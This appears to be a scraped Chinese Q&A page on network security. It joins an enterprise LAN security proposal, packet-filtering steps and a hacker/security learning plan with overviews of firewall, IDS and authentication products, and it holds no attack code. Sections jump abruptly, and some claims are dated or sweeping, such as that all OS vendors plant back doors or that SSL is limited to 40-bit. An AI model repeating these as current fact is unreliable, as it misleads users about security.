不能進行包過濾的設備是

① 企業區域網前言怎麼寫

某大型企業區域網安全解決方案
前言：
這是我為某大型企業寫一份區域網安全解決方案建議書。本來這是不應該公開的，但是由於種種原因未能被採納，所以也沒什麼大礙，現在拿出來給大家當作是一份參考資料，寫的不好多多指教。文章是讓大家參考的，不是讓大家翻錄的

第一章 總則

本方案為某大型區域網網路安全解決方案，包括原有網路系統分析、安全需求分析、安全目標的確立、安全體系結構的設計、等。本安全解決方案的目標是在不影響某大型企業區域網當前業務的前提下，實現對他們區域網全面的安全管理。

發送電子郵件等；

2.3 網路結構的特點

在分析這個企業區域網的安全風險時，應考慮到網路的如下幾個特點：

1.網路與Internet直接連結，因此在進行安全方案設計時要考慮與Internet連結的有關風險，包括可能通過Internet傳播進來病毒，黑客攻擊，來自Internet的非授權訪問等。
。
2.網路中存在公開伺服器，由於公開伺服器對外必須開放部分業務，因此在進行安全方案設計時應該考慮採用安全伺服器網路，避免公開伺服器的安全風險擴散到內部。
3.內部網路中存在許多不同的子網，不同的子網有不同的安全性，因此在進行安全方案設計時，應考慮將不同功能和安全級別的網路分割開，這可以通過交換機劃分VLAN來實現。
4.網路中有二台應用伺服器，在應用程序開發時就應考慮加強用戶登錄驗證，防止非授權的訪問。
總而言之，在進行網路方案設計時，應綜合考慮到這個企業區域網的特點，根據產品的性能、價格、潛在的安全風險進行綜合考慮。

第三章 網路系統安全風險分析

隨著Internet網路急劇擴大和上網用戶迅速增加，風險變得更加嚴重和復雜。原來由單個計算機安全事故引起的損害可能傳播到其他系統，引起大范圍的癱瘓和損失；另外加上缺乏安全控制機制和對Internet安全政策的認識不足，這些風險正日益嚴重。

針對這個企業區域網中存在的安全隱患，在進行安全方案設計時，下述安全風險我們必須要認真考慮，並且要針對面臨的風險，採取相應的安全措施。下述風險由多種因素引起，與這個企業區域網結構和系統的應用、區域網內網路伺服器的可靠性等因素密切相關。下面列出部分這類風險因素：

網路安全可以從以下三個方面來理解：1 網路物理是否安全；2 網路平台是否安全；3 系統是否安全；4 應用是否安全；5 管理是否安全。針對每一類安全風險，結合這個企業區域網的實際情況，我們將具體的分析網路的安全風險。

3.1物理安全風險分析

網路的物理安全的風險是多種多樣的。
網路的物理安全主要是指地震、水災、火災等環境事故；電源故障；人為操作失誤或錯誤；設備被盜、被毀；電磁干擾；線路截獲。以及高可用性的硬體、雙機多冗餘的設計、機房環境及報警系統、安全意識等。它是整個網路系統安全的前提，在這個企業區區域網內，由於網路的物理跨度不大，，只要制定健全的安全管理制度，做好備份，並且加強網路設備和機房的管理，這些風險是可以避免的。

3.2網路平台的安全風險分析

網路結構的安全涉及到網路拓撲結構、網路路由狀況及網路的環境等。

公開伺服器面臨的威脅

這個企業區域網內公開伺服器區（WWW、EMAIL等伺服器）作為公司的信息發布平台，一旦不能運行後者受到攻擊，對企業的聲譽影響巨大。同時公開伺服器本身要為外界服務，必須開放相應的服務；每天，黑客都在試圖闖入Internet節點，這些節點如果不保持警惕，可能連黑客怎麼闖入的都不知道，甚至會成為黑客入侵其他站點的跳板。因此，規模比較大網路的管理人員對Internet安全事故做出有效反應變得十分重要。我們有必要將公開伺服器、內部網路與外部網路進行隔離，避免網路結構信息外泄；同時還要對外網的服務請求加以過濾，只允許正常通信的數據包到達相應主機，其他的請求服務在到達主機之前就應該遭到拒絕。

整個網路結構和路由狀況

安全的應用往往是建立在網路系統之上的。網路系統的成熟與否直接影響安全系統成功的建設。在這個企業區域網絡系統中，只使用了一台路由器，用作與Internet連結的邊界路由器，網路結構相對簡單，具體配置時可以考慮使用靜態路由，這就大大減少了因網路結構和網路路由造成的安全風險。

3.3系統的安全風險分析

所謂系統的安全顯而易見是指整個區域網網路操作系統、網路硬體平台是否可靠且值得信任。

網路操作系統、網路硬體平台的可靠性：對於中國來說，恐怕沒有絕對安全的操作系統可以選擇，無論是Microsoft的Windows NT或者其他任何商用UNIX操作系統，其開發廠商必然有其Back-Door。我們可以這樣講：沒有完全安全的操作系統。但是，我們可以對現有的操作平台進行安全配置、對操作和訪問許可權進行嚴格控制，提高系統的安全性。因此，不但要選用盡可能可靠的操作系統和硬體平台。而且，必須加強登錄過程的認證（特別是在到達伺服器主機之前的認證），確保用戶的合法性；其次應該嚴格限制登錄者的操作許可權，將其完成的操作限制在最小的范圍內。

3.4應用的安全風險分析

應用系統的安全跟具體的應用有關，它涉及很多方面。應用系統的安全是動態的、不斷變化的。應用的安全性也涉及到信息的安全性，它包括很多方面。
應用系統的安全動態的、不斷變化的：應用的安全涉及面很廣，以目前Internet上應用最為廣泛的E-mail系統來說，其解決方案有幾十種，但其系統內部的編碼甚至編譯器導致的BUG是很少有人能夠發現的，因此一套詳盡的測試軟體是相當必須的。但是應用系統是不斷發展且應用類型是不斷增加的，其結果是安全漏洞也是不斷增加且隱藏越來越深。因此，保證應用系統的安全也是一個隨網路發展不斷完善的過程。
應用的安全性涉及到信息、數據的安全性：信息的安全性涉及到：機密信息泄露、未經授權的訪問、破壞信息完整性、假冒、破壞系統的可用性等。由於這個企業區域網跨度不大，絕大部分重要信息都在內部傳遞，因此信息的機密性和完整性是可以保證的。對於有些特別重要的信息需要對內部進行保密的（比如領導子網、財務系統傳遞的重要信息）可以考慮在應用級進行加密，針對具體的應用直接在應用系統開發時進行加密。
3.5管理的安全風險分析

管理是網路安全中最重要的部分
管理是網路中安全最最重要的部分。責權不明，管理混亂、安全管理制度不健全及缺乏可操作性等都可能引起管理安全的風險。責權不明，管理混亂，使得一些員工或管理員隨便讓一些非本地員工甚至外來人員進入機房重地，或者員工有意無意泄漏他們所知道的一些重要信息，而管理上卻沒有相應制度來約束。
當網路出現攻擊行為或網路受到其它一些安全威脅時（如內部人員的違規操作等），無法進行實時的檢測、監控、報告與預警。同時，當事故發生後，也無法提供黑客攻擊行為的追蹤線索及破案依據，即缺乏對網路的可控性與可審查性。這就要求我們必須對站點的訪問活動進行多層次的記錄，及時發現非法入侵行為。
建立全新網路安全機制，必須深刻理解網路並能提供直接的解決方案，因此，最可行的做法是管理制度和管理解決方案的結合。

3.6黑客攻擊

黑客們的攻擊行動是無時無刻不在進行的，而且會利用系統和管理上的一切可能利用的漏洞。公開伺服器存在漏洞的一個典型例證，是黑客可以輕易地騙過公開伺服器軟體，得到Unix的口令文件並將之送回。黑客侵入UNIX伺服器後，有可能修改特權，從普通用戶變為高級用戶，一旦成功，黑客可以直接進入口令文件。黑客還能開發欺騙程序，將其裝入UNIX伺服器中，用以監聽登錄會話。當它發現有用戶登錄時，便開始存儲一個文件，這樣黑客就擁有了他人的帳戶和口令。這時為了防止黑客，需要設置公開伺服器，使得它不離開自己的空間而進入另外的目錄。另外，還應設置組特權，不允許任何使用公開伺服器的人訪問WWW頁面文件以外的東西。在這個企業的區域網內我們可以綜合採用防火牆技術、Web頁面保護技術、入侵檢測技術、安全評估技術來保護網路內的信息資源，防止黑客攻擊。

3.7通用網關介面（CGI）漏洞

有一類風險涉及通用網關介面（CGI）腳本。許多頁面文件和指向其他頁面或站點的超連接。然而有些站點用到這些超連接所指站點尋找特定信息。搜索引擎是通過CGI腳本執行的方式實現的。黑客可以修改這些CGI腳本以執行他們的非法任務。通常，這些CGI腳本只能在這些所指WWW伺服器中尋找，但如果進行一些修改，他們就可以在WWW伺服器之外進行尋找。要防止這類問題發生，應將這些CGI腳本設置為較低級用戶特權。提高系統的抗破壞能力，提高伺服器備份與恢復能力，提高站點內容的防篡改與自動修復能力。

3.8惡意代碼

惡意代碼不限於病毒，還包括蠕蟲、特洛伊木馬、邏輯炸彈、和其他未經同意的軟體。應該加強對惡意代碼的檢測。

3.9病毒的攻擊

計算機病毒一直是計算機安全的主要威脅。能在Internet上傳播的新型病毒，例如通過E-Mail傳播的病毒，增加了這種威脅的程度。病毒的種類和傳染方式也在增加，國際空間的病毒總數已達上萬甚至更多。當然，查看文檔、瀏覽圖像或在Web上填表都不用擔心病毒感染，然而，下載可執行文件和接收來歷不明的E-Mail文件需要特別警惕，否則很容易使系統導致嚴重的破壞。典型的「CIH」病毒就是一可怕的例子。

3.10不滿的內部員工

不滿的內部員工可能在WWW站點上開些小玩笑，甚至破壞。不論如何，他們最熟悉伺服器、小程序、腳本和系統的弱點。對於已經離職的不滿員工，可以通過定期改變口令和刪除系統記錄以減少這類風險。但還有心懷不滿的在職員工，這些員工比已經離開的員工能造成更大的損失，例如他們可以傳出至關重要的信息、泄露安全重要信息、錯誤地進入資料庫、刪除數據等等。

3.11網路的攻擊手段

一般認為，目前對網路的攻擊手段主要表現在：
非授權訪問：沒有預先經過同意，就使用網路或計算機資源被看作非授權訪問，如有意避開系統訪問控制機制，對網路設備及資源進行非正常使用，或擅自擴大許可權，越權訪問信息。它主要有以下幾種形式：假冒、身份攻擊、非法用戶進入網路系統進行違法操作、合法用戶以未授權方式進行操作等。
信息泄漏或丟失：指敏感數據在有意或無意中被泄漏出去或丟失，它通常包括，信息在傳輸中丟失或泄漏（如"黑客"們利用電磁泄漏或搭線竊聽等方式可截獲機密信息，或通過對信息流向、流量、通信頻度和長度等參數的分析，推出有用信息，如用戶口令、帳號等重要信息。），信息在存儲介質中丟失或泄漏，通過建立隱蔽隧道等竊取敏感信息等。
破壞數據完整性：以非法手段竊得對數據的使用權，刪除、修改、插入或重發某些重要信息，以取得有益於攻擊者的響應；惡意添加，修改數據，以干擾用戶的正常使用。
拒絕服務攻擊：它不斷對網路服務系統進行干擾，改變其正常的作業流程，執行無關程序使系統響應減慢甚至癱瘓，影響正常用戶的使用，甚至使合法用戶被排斥而不能進入計算機網路系統或不能得到相應的服務。
利用網路傳播病毒：通過網路傳播計算機病毒，其破壞性大大高於單機系統，而且用戶很難防範。
第四章 安全需求與安全目標

4.1安全需求分析

通過前面我們對這個企業區域網絡結構、應用及安全威脅分析，可以看出其安全問題主要集中在對伺服器的安全保護、防黑客和病毒、重要網段的保護以及管理安全上。因此，我們必須採取相應的安全措施杜絕安全隱患，其中應該做到：

公開伺服器的安全保護
防止黑客從外部攻擊
入侵檢測與監控
信息審計與記錄
病毒防護
數據安全保護
數據備份與恢復
網路的安全管理

針對這個企業區域網絡系統的實際情況，在系統考慮如何解決上述安全問題的設計時應滿足如下要求：

1.大幅度地提高系統的安全性（重點是可用性和可控性）；

2.保持網路原有的能特點，即對網路的協議和傳輸具有很好的透明性，能透明接入，無需更改網路設置；
3.易於操作、維護，並便於自動化管理，而不增加或少增加附加操作；
4.盡量不影響原網路拓撲結構，同時便於系統及系統功能的擴展；
5.安全保密系統具有較好的性能價格比，一次性投資，可以長期使用；
6.安全產品具有合法性，及經過國家有關管理部門的認可或認證；
7.分布實施。

4.2網路安全策略

安全策略是指在一個特定的環境里，為保證提供一定級別的安全保護所必須遵守的規則。該安全策略模型包括了建立安全環境的三個重要組成部分，即：
威嚴的法律：安全的基石是社會法律、法規、與手段，這部分用於建立一套安全管理標准和方法。即通過建立與信息安全相關的法律、法規，使非法分子懾於法律，不敢輕舉妄動。
先進的技術：先進的安全技術是信息安全的根本保障，用戶對自身面臨的威脅進行風險評估，決定其需要的安全服務種類，選擇相應的安全機制，然後集成先進的安全技術。
嚴格的管理：各網路使用機構、企業和單位應建立相宜的信息安全管理辦法，加強內部管理，建立審計和跟蹤體系，提高整體信息安全意識。

4.3系統安全目標

基於以上的分析，我們認為這個區域網網路系統安全應該實現以下目標：
建立一套完整可行的網路安全與網路管理策略
將內部網路、公開伺服器網路和外網進行有效隔離，避免與外部網路的直接通信
建立網站各主機和伺服器的安全保護措施，保證他們的系統安全
對網上服務請求內容進行控制，使非法訪問在到達主機前被拒絕
加強合法用戶的訪問認證，同時將用戶的訪問許可權控制在最低限度
全面監視對公開伺服器的訪問，及時發現和拒絕不安全的操作和黑客攻擊行為
加強對各種訪問的審計工作，詳細記錄對網路、公開伺服器的訪問行為，形成完 整的系統日誌
備份與災難恢復——強化系統備份，實現系統快速恢復
加強網路安全管理，提高系統全體人員的網路安全意識和防範技術

第五章 網路安全方案總體設計

5.1安全方案設計原則

在對這個企業區域網網路系統安全方案設計、規劃時，應遵循以下原則：

綜合性、整體性原則：應用系統工程的觀點、方法，分析網路的安全及具體措施。安全措施主要包括：行政法律手段、各種管理制度（人員審查、工作流程、維護保障制度等）以及專業措施（識別技術、存取控制、密碼、低輻射、容錯、防病毒、採用高安全產品等）。一個較好的安全措施往往是多種方法適當綜合的應用結果。一個計算機網路，包括個人、設備、軟體、數據等。這些環節在網路中的地位和影響作用，也只有從系統綜合整體的角度去看待、分析，才能取得有效、可行的措施。即計算機網路安全應遵循整體安全性原則，根據規定的安全策略制定出合理的網路安全體系結構。

需求、風險、代價平衡的原則：對任一網路，絕對安全難以達到，也不一定是必要的。對一個網路進行實際額研究（包括任務、性能、結構、可靠性、可維護性等），並對網路面臨的威脅及可能承擔的風險進行定性與定量相結合的分析，然後制定規范和措施，確定本系統的安全策略。

一致性原則：一致性原則主要是指網路安全問題應與整個網路的工作周期（或生命周期）同時存在，制定的安全體系結構必須與網路的安全需求相一致。安全的網路系統設計（包括初步或詳細設計）及實施計劃、網路驗證、驗收、運行等，都要有安全的內容光煥發及措施，實際上，在網路建設的開始就考慮網路安全對策，比在網路建設好後再考慮安全措施，不但容易，且花費也小得多。

易操作性原則：安全措施需要人為去完成，如果措施過於復雜，對人的要求過高，本身就降低了安全性。其次，措施的採用不能影響系統的正常運行。

分步實施原則：由於網路系統及其應用擴展范圍廣闊，隨著網路規模的擴大及應用的增加，網路脆弱性也會不斷增加。一勞永逸地解決網路安全問題是不現實的。同時由於實施信息安全措施需相當的費用支出。因此分步實施，即可滿足網路系統及信息安全的基本需求，亦可節省費用開支。

多重保護原則：任何安全措施都不是絕對安全的，都可能被攻破。但是建立一個多重保護系統，各層保護相互補充，當一層保護被攻破時，其它層保護仍可保護信息的安全。

可評價性原則：如何預先評價一個安全設計並驗證其網路的安全性，這需要通過國家有關網路信息安全測評認證機構的評估來實現。

5.2安全服務、機制與技術

安全服務：安全服務主要有：控制服務、對象認證服務、可靠性服務等；

安全機制：訪問控制機制、認證機制等；

安全技術：防火牆技術、鑒別技術、審計監控技術、病毒防治技術等；在安全的開放環境中，用戶可以使用各種安全應用。安全應用由一些安全服務來實現；而安全服務又是由各種安全機制或安全技術來實現的。應當指出，同一安全機制有時也可以用於實現不同的安全服務。
第六章 網路安全體系結構

通過對網路的全面了解，按照安全策略的要求、風險分析的結果及整個網路的安全目標，整個網路措施應按系統體系建立。具體的安全控制系統由以下幾個方面組成：物理安全、網路安全、系統安全、信息安全、應用安全和安全管理

6.1物理安全

保證計算機信息系統各種設備的物理安全是整個計算機信息系統安全的前提，物理安全是保護計算機網路設備、設施以及其它媒體免遭地震、水災、火災等環境事故以及人為操作失誤或錯誤及各種計算機犯罪行為導致的破壞過程。 它主要包括三個方面：

環境安全：對系統所在環境的安全保護，如區域保護和災難保護；（參見國家標准GB50173－93《電子計算機機房設計規范》、國標GB2887－89《計算站場地技術條件》、GB9361－88《計算站場地安全要求》
設備安全：主要包括設備的防盜、防毀、防電磁信息輻射泄漏、防止線路截獲、抗電磁干擾及電源保護等；
媒體安全：包括媒體數據的安全及媒體本身的安全。

在網路的安全方面，主要考慮兩個大的層次，一是整個網路結構成熟化，主要是優化網路結構，二是整個網路系統的安全。

6.2.1網路結構

安全系統是建立在網路系統之上的，網路結構的安全是安全系統成功建立的基礎。在整個網路結構的安全方面，主要考慮網路結構、系統和路由的優化。
網路結構的建立要考慮環境、設備配置與應用情況、遠程聯網方式、通信量的估算、網路維護管理、網路應用與業務定位等因素。成熟的網路結構應具有開放性、標准化、可靠性、先進性和實用性，並且應該有結構化的設計，充分利用現有資源，具有運營管理的簡便性，完善的安全保障體系。網路結構採用分層的體系結構，利於維護管理，利於更高的安全控制和業務發展。
網路結構的優化，在網路拓撲上主要考慮到冗餘鏈路；防火牆的設置和入侵檢測的實時監控等。

6.2.2網路系統安全

6.2.2.1 訪問控制及內外網的隔離

訪問控制
訪問控制可以通過如下幾個方面來實現：
1.制訂嚴格的管理制度:可制定的相應：《用戶授權實施細則》、《口令字及帳戶管理規范》、《許可權管理制度》。
2.配備相應的安全設備：在內部網與外部網之間，設置防火牆實現內外網的隔離與訪問控制是保護內部網安全的最主要、同時也是最有效、最經濟的措施之一。防火牆設置在不同網路或網路安全域之間信息的唯一出入口。

防火牆主要的種類是包過濾型，包過濾防火牆一般利用IP和TCP包的頭信息對進出被保護網路的IP包信息進行過濾，能根據企業的安全政策來控制（允許、拒絕、監測）出入網路的信息流。同時可實現網路地址轉換（NAT）、審記與實時告警等功能。由於這種防火牆安裝在被保護網路與路由器之間的通道上，因此也對被保護網路和外部網路起到隔離作用。

防火牆具有以下五大基本功能：過濾進、出網路的數據；管理進、出網路的訪問行為；封堵某些禁止的業務；記錄通過防火牆的信息內容和活動；對網路攻擊的檢測和告警。

6.2.2.2 內部網不同網路安全域的隔離及訪問控制

② 包過濾防火牆的基本過程

下面做個簡單的敘述：
（1）包過濾規則必須被包過濾設備埠存儲起來內。
（2）當包到達埠時，對包報頭容進行語法分析。大多數包過濾設備只檢查IP、TCP、或UDP報頭中的欄位。
（3）包過濾規則以特殊的方式存儲。應用於包的規則的順序與包過濾器規則存儲順序必須相同。
（4）若一條規則阻止包傳輸或接收，則此包便不被允許。
（5）若一條規則允許包傳輸或接收，則此包便可以被繼續處理。
（6）若包不滿足任何一條規則，則此包便被阻塞。

③ 安全設備指什麼（包過濾、訪問控制）

保衛自我的一些攝制器材！一些保障你隱私的軟體和設備。一般是密碼，防毒軟體密碼、安全防護等！@不同的應用，安全設備的定義不用，太廣泛了

④ 有關黑客的問題

基礎：
如何去學習
·要有學習目標
·要有學習計劃
·要有正確的心態
·有很強的自學能力

學習目標
·1.明確自己的發展方向(你現在或者將來要做什麼,程序員?安全專家?網路黑客等)
·2.自己目前的水平和能力有多高
·能簡單操作windows2000
·能簡單配置windows2000的一些服務
·能熟練的配置Windows2000的各種服務
·能熟練配置win2000和各種網路設備聯網
·能簡單操作Linux,Unix,Hp-unix, Solaris中的一種或者多種操作系統
·能配置cicso,huawei,3com,朗迅等網路設備
·會簡單編寫C/C++,Delphi,Java,PB,VB,Perl
·能簡單編寫Asp,Php,Cgi和script,shell腳本

·3.必須學會不相信態度,尊重各種各樣的能力
·不要為那些裝模做樣的人浪費時間
·尊重別人的能力,
·會享受提高自己能力的樂趣.
·在知道了自己的水平和能力之後就要開始自己的目標了
·--------安全專家
·--------黑客
·--------高級程序員
·黑客是建設網路,不是破壞網路, 破壞者是駭客;
·黑客有入侵的技術,但是他們是維護網路的,所以和安全專家是差不多的;
·因為懂得如何入侵才知道如何維護
·因為懂得如何維護才更要了解如何入侵
·這是 黑客與安全專家的聯系
·但,他們都是在會編程的基礎上成長的!
·下面我們開始我們的學習計劃!

學習計劃
有了學習計劃才能更有效的學習

安全學習計劃
不奢求對win98有多麼精通,我們也不講解win98如何應用,如何精通,我們的起步是win2000 s
erver,這是我們培訓的最低標准,你對英語有一定的了解也是必不可少

最基礎
·a.會裝win2000,知道在安裝的時候有兩種分區格式,NTFS與FAT32 及他們的區別,知道win2
000可以在安裝的時候分區,格式化硬碟, 可以定製安裝,可以定製自己需要安裝的一些組件
,如果有網路適配器,可以直接加入域中 學習點:NTFS和FAT32分區的不同 各個組件的作用
域的定義
·b.知道如何開,關機 知道注銷的用處
·c.知道win2000下面各主要目錄的作用 Documents and Settings,WINNT,system32 Progra
m Files
·d.知道管理工具裡面各個組件的定義
·e.學會應用命令提示符cmd(dos)
·f.知道計算機管理裡面的各個選項的不通
·g.知道win2000強大的網路管理功能
·h.能非常熟練的操作win2000
·i.知道IP地址,子網掩碼,網關和MAC的區別

進階
·A.配置IIS,知道各個選項的作用
·B.配置DNS,DHCP
·C.配置主控制域,輔助域
·D.配置DFS
·E.配置路由和遠程訪問

·F.配置安全策略IPSEC
·G.配置service(服務)
·H.配置磁碟管理,磁碟分額
·i. 配置RAID(0,1,0+1,5)
·J.路由器的安裝與簡單配置
·K.交換機的安裝與簡單配置
·L.常見的VPN,VLAN,NAT配置
·M.配置常見的企業級防火牆
·N.配置常見的企業級防病毒軟體

高級
·之前我們學到的是任何一個想成為網路安全專家和黑客基本知識中的一部分
·你作到了嗎??
·如果你做到了,足以找到一份很不錯的工作!

配置負載均衡
·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+負載均衡+ASP(PHP.CGI)+CHECK PIONT(ISA
SERVER) ·
·配置三層交換網路 ·
·配置各種復雜的網路環境
·能策劃一個非常完整的網路方案 ·
·能獨自組建一個大型的企業級網路 ·

·能迅速解決網路中出現的各種疑難問題

結束
·在你上面的都學好了,你已經是一個高級人才了,也是我們VIP培訓的目標!
·可以找到一份非常好的工作
·不會再因為給女朋友買不起玫瑰而發愁了!

安全：
導讀
·系統安全服務(SYSTEM)
·防火牆系統(FIREWALL)
·入侵檢測(IDS)
·身份驗證(CA)
·網站監控和恢復(WEBSITE)
·安全電子商務(E-BUSINESS)
·安全電子郵件(E-MAIL)
·安全辦公自動化(OA)
·Internet訪問和監控(A&C)
·病毒防範(VIRUS)
·虛擬區域網(VPN)

系統安全服務

·系統安全管理
·系統安全評估
·系統安全加固
·系統安全維護
·安全技能學習

系統安全管理
·信息系統安全策略
·信息系統管理員安全手冊
·信息系統用戶安全手冊
·緊急事件處理流程

系統安全評估
1、系統整體安全分析
· 分析用戶的網路拓撲結構，以找出其結構性及網路 配置上存在的安全隱患。
· 通過考察用戶信息設備的放置場地，以使得設備物理上是安全的。
· 分析用戶信息系統的管理、使用流程，以使得系統 能夠安全地管理、安全地使用
2、主機系統安全檢測
· 通過對主機進行安全掃描，以發現系統的常見的安全漏洞。
· 對於特定的系統，採用特別的工具進行安全掃描。
· 根據經驗，對系統存在的漏洞進行綜合分析。
· 給出系統安全漏洞報告。

· 指出各個安全漏洞產生的原因以及會造成的危險。
· 給出修復安全漏洞的建議
3、網路設備安全檢測
· 通過對網路進行安全掃描，以發現網路設備的安全漏洞。
· 根據經驗，對網路設備存在的漏洞進行綜合析。
· 給出網路設備安全漏洞報告。
· 指出各個安全漏洞產生的原因以及會造成的險。
· 給出修復安全漏洞的建議。

安全系統加固
·為用戶系統打最新安全補丁程序。
·為用戶修復系統、網路中的安全漏洞。
·為用戶去掉不必要的服務和應用系統。
·為用戶系統設置用戶許可權訪問策略。
·為用戶系統設置文件和目錄訪問策略。
·針對用戶系統應用進行相應的安全處理。

安全系統維護
·防火牆系統維護，安全日誌分析
·IDS系統維護，安全日誌分析
·VPN系統維護，安全日誌分析
·認證系統維護，安全日誌分析

·伺服器、主機系統，安全日誌分析
·其它各類安全設施維護及日誌分析

安全技能培訓
·網路安全基礎知識
·網路攻擊手段演示和防範措施
·防火牆的原理和使用
·VPN的原理和使用
·漏洞掃描工具的原理和使用
·IDS（入侵檢測系統）的原理和使用
·身份認證系統的原理和使用
·防病毒產品的原理和使用
·系統管理員安全培訓
·一般用戶安全培訓

防火牆系統
·防火牆的定義
·防火牆的分類
·包過濾防火牆
·應用網關防火牆
·狀態檢測防火牆
·一般企業防火牆配置

·政府機構防火牆配置
·涉密網路保密網關配置
·高可用性和負載均衡防火牆系統
·高速防火牆系統

防火牆的定義
·用以連接不同信任級別網路的設備。
·用來根據制定的安全規則對網路間的通信進行控制

防火牆的分類
·包過濾 (Packet Filters)
·應用網關 (Application Gateways)
·狀態檢測(Stateful Inspection)

包過濾防火牆
·包 過 濾 技 術
·主要在路由器上實現，根據用戶定義的內容（如IP地址、埠號）進行過濾。包過濾在網
絡層進行包檢查與應用無關。
· 優 點
· 具有良好的性能和可伸縮性。
· 缺點
· 由於包過濾技術是對應用不敏感的，無法理解特定通訊的含義，因而安全性很差。

應用網關防火牆
·應用網關技術
·第二代防火牆技術，其在應用的檢查方面有了較大的改進,能監測所有應用層，同時對應
用「內容」（Content Information）的含義引入到了防火牆策略的決策處理。
· 優點
· 安全性比較高。
· 缺點
· 1、該方法對每一個請求都必須建立兩個連接，一個從客戶端到防火牆系統，另一個從
防火牆系統到伺服器，這會嚴重影響性能。
· 2、防火牆網關暴露在攻擊者之中。
· 3、對每一個代理需要有一個獨立的應用進程或 daemon 來處理， 這樣擴展性和支持
新應用方面存在問題。

檢測狀態防火牆
· 屬第三代防火牆技術，克服了以上兩種方法的缺點，引入了OSI全七層監測能力，同時
又能保持 Client/Server的體系結構，也即對用戶訪問是透明的。
· 防火牆能保護、限制其他用戶對防火牆網關本身的訪問。
· 狀態檢測技術在網路層截獲數據包後交給INSPECT Engine,通過 INSPECT Engine 可以
從數據包中抽取安全決策所需的所有源於應用層中的狀態相關信息，並在動態狀態表中 維
持這些信息以提供後繼連接的可能性預測。該方法能提供高安全性、高性能和擴展性、高伸
縮性的解決方案。

入侵檢測系統
·處理攻擊時遇到的典型問題
·解決入侵的方法和手段
·基於網路的入侵檢測
·基於主機的入侵檢測
·入侵檢測系統典型配置

處理攻擊時遇到的問題
·獲得的信息不足
·不知到網路上發生了什麼事。
·無法判定系統是否已經被入侵。
·信息不準確
·人員少
·沒有足夠的人員維護管理。
·缺乏規范的處理程序
·發現攻擊時如何反應?
·下一步該如何處理?

解決入侵的方法和手段
·採用入侵實時入侵監控系統（IDS）
·對系統、網路中發生的事件進行實時監控。

·當發生入侵事件時能即時反應。
·對入侵事件進行詳細記錄並跟蹤。

基於主機的入侵檢測
·軟體模塊安裝在包含有重要數據的主機上
·監視操作系統的日誌以發現攻擊的特徵。
·監視代理所處主機上的所有進程和用戶.
·監視暴力登錄攻擊（brute-force login）, 試圖改變或繞過安全設定，及特權的濫用等
。
·當新的日誌產生時，為了減小對CPU的影響，代理程序暫時中斷。

基於網路的入侵檢測
·軟體安裝在專門的主機上，放置於關鍵的網段
·將配置該軟體主機的網卡設置為混雜模式，使得該主機能接受網段上所有的包。
·分析數據包以判斷是否有黑客攻擊。
·監視網段上的所有數據。
·對網路的流量無任何影響。
·能檢測到 denial of service attacks, unauthorized access attempts, pre-attack s
cans等攻擊。

身份認證系統
·用戶身份認證的方法

·不同認證方法的安全級別
·用戶身份認證的常用方式
·解決問題的方法
·目前比較成熟的雙因素認證方法

用戶身份驗證
·你知道的一些東西
· 密碼, 身份證號，生日
·你有的一些東西
· 磁卡, 智能卡,令牌, 鑰匙
·你獨有的一些東西
· 指紋,聲音，視網膜

密碼是不安全的
·可以破解密碼的工具太多
·大多密碼在網路中是明文傳輸的
·密碼可以網路離線時被窺測
·密碼和文件從PC和伺服器上被轉移了
·好記的密碼容易被猜到,不易猜測的密碼又太難記

解決方法
·使用混合的工具:如IC卡+PIN

網站監控與恢復系統
·典型的Web伺服器應用
·Web伺服器存在的安全問題
·網站安全解決方法

典型web伺服器應用
·Internet-->路由器-->防火牆-->web站點
· |
· |
· 內部網
·所有的放在防火牆後面

Web伺服器存在的安全問題
· 網頁被非法篡改是網站內容提供者最頭痛的問題。在採用防火牆後，Web伺服器本身的漏
洞成為了網站被黑的主要問題。
· Web應用伺服器(如IIS,Apache中存在著大量的安 全漏洞.)
· 用戶自己開發的CGI、ASP、PHP應用中存在著大量潛在的漏洞。

網站安全
·採用Web伺服器監控與恢復系統

·該系統提供對網站文件內容的實時監控，發現被改動後立即報警並自動恢復。

電子商務安全系統
·典型的電子商務應用
·電子商務中存在的安全問題
·電子商務的安全解決方法
·實時數據交換系統

典型電子商務應用
·Internet--->防火牆--->Web伺服器
· || |
· || |
· 內部網(資料庫)

電子商務中存在的安全問題
·1、Web伺服器端
·Web應用伺服器（如IIS、Apache中存在著大量的安全漏洞。用戶自己開發的CGI、ASP、PH
P應用中存在著潛在的漏洞。
· 黑客通過這些漏洞攻擊Web伺服器，可非法篡改網頁，造成惡劣影響，動搖了電子商務使
用者的信心。
· 甚至可獲得Web伺服器上大量的敏感資料，如用戶的信用卡號，用以連接內部資料庫的帳
號和口令。

· 可能通過控制Web伺服器，來攻擊內部資料庫。

電子商務中存在的安全問題
·2、SSL協議
·SSL加密強度低。由於瀏覽器默認的加密模塊只支持40位的低強度加密，而且即使在瀏覽
器中安裝更高位的加密模塊，由於WEB伺服器不提供對高位SSL鏈接的支持同樣無法實現高強
度SSL加密鏈接。
· 無法解決電子商務中的用戶簽名。SSL鏈接建立WEB伺服器和用戶瀏覽器之間的安全通道
只能保證在安全通道內的信息不被竊聽或篡改，並不能對用戶發送的信息進行簽名以保證信
息的有效性和不可抵賴性，而這正是電子商務中必須解決的問題。

電子商務的安全解決方法
·將WEB伺服器分為兩部分：一般內容的WEB伺服器和交易WEB伺服器。
· 一般內容的WEB伺服器放置在DMZ區內，採用WEB站點監控和恢復系統保護，防止主頁被非
法改動。
· 交易WEB伺服器放置在內部網內，通過一台物理分隔的實時數據交換系統將其與DMZ區相
連。
· 在客戶機和伺服器端安裝SSL代理，從而獲得128位的高強度加密通道

實時數據交換系統
·將系統外部 Web伺服器和內部應用Web伺服器物理隔開.
·外部Web伺服器用於存放一般的信息，內部Web服 務器用於存放敏感信息，並和內部數據

庫連接。
·外部用戶通過http訪問位於DMZ區內的一般Web伺服器。
·當進行交易時，用戶需訪問位於內部網內的應用伺服器。
·https連接首先到達實時數據交換系統的虛擬外部Web伺服器，實時數據交換系統將https
協議解開，只將https連接的數據內容拷貝到虛擬內部Web伺服器，虛擬內部Web伺服器將使
用該數據重新發起https連接到實際的內部應用Web伺服器.
·內外通過實時數據交換系統進行數據交換，無任何協議和連接穿過實時數據交換系統。
·即使DMZ區的Web伺服器受到攻擊, 攻擊者也的不到任何有用的信息

安全電子郵件系統
·電子郵件的安全問題
·安全電子郵件的解決方法
·一個安全郵件的使用過程

電子郵件的安全問題
·如何保證發送的敏感信息不被泄漏
·如何保證發送的信息不被篡改
·如何確認發件人的真實身份
·如何防止發件人的抵賴行為

安全電子郵件的解決方法
